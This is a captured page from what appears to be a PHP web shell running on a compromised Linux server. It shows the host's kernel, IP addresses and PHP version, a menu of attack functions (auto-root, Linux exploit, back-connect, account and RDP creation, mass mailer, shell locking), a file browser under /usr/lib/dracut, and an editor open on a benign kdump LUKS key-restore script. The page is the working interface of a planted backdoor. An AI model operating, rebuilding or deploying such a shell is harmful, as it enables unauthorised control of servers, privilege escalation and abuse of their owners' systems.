Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
dracut /
modules.d /
99kdumpbase /
[ HOME SHELL ]
Name
Size
Permission
Action
kdump-capture.service
945
B
-rw-r--r--
kdump-emergency.service
688
B
-rw-r--r--
kdump-emergency.target
451
B
-rw-r--r--
kdump.sh
15.05
KB
-rwxr-xr-x
kexec-crypt-setup.sh
509
B
-rw-r--r--
module-setup.sh
39.91
KB
-rwxr-xr-x
monitor_dd_progress
482
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kexec-crypt-setup.sh
#!/bin/sh # LUKS_CONFIGFS_RESTORE=/sys/kernel/config/crash_dm_crypt_keys/restore RESTORED=1 MAX_WAIT_TIME=10 wait_time=0 while [ $wait_time -lt $MAX_WAIT_TIME ]; do [ -e $LUKS_CONFIGFS_RESTORE ] && break sleep 1 wait_time=$((wait_time + 1)) done if [ $wait_time -ge $MAX_WAIT_TIME ]; then echo "$LUKS_CONFIGFS_RESTORE isn't ready after ${MAX_WAIT_TIME}s, something wrong!" exit 1 fi if ! grep -q "$RESTORED" "$LUKS_CONFIGFS_RESTORE"; then echo $RESTORED > $LUKS_CONFIGFS_RESTORE fi
Close